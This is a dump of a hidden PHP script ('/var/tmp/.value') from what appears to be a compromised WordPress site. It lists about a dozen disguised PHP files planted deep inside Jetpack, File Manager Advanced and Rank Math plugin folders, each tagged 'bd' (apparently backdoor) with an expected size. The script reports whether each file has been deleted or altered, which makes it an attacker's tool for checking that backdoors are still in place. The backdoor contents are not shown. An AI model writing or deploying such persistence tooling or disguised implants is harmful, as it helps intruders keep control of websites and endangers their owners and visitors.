Current File : //proc/self/root/var/tmp/.value
<?php   $r = '/home/vblioqus/luckylandslots.pro'; $x = ["/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-videopress/build/divi-editor/Strategy.php"=>"bd@@12846@@1014",
"/wp-content/plugins/file-manager-advanced/application/library/php-parser/vendor/nikic/php-parser/lib/PhpParser/Node/Stmt/TraitUseAdaptation/album_comment.php"=>"bd@@14709@@917",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Framework/MockObject/Builder/Match.php"=>"bd@@14721@@968",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-forms/dist/blocks/field-rating/php_http_proxy.php"=>"bd@@14735@@891",
"/wp-content/plugins/seo-by-rank-math/vendor/wp-media/wp-mixpanel/src/Classes/Base/uc.php"=>"bd@@14750@@986",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-connection/src/webhooks/class.authorize.redirect.php"=>"bd@@14762@@940",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/myclabs/deep-copy/src/DeepCopy/TypeFilter/dbconnect.bak.php"=>"bd@@18131@@1044",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phar-io/manifest/src/values/page_tail.php"=>"bd@@18132@@894",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-forms/dist/blocks/field-image-select/groups.php"=>"bd@@18133@@878",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-publicize/src/jetpack-social-settings/class.settings.notices.php"=>"bd@@18134@@987",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-paypal-payments/dist/block/com_news_portal.php"=>"bd@@18135@@892"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');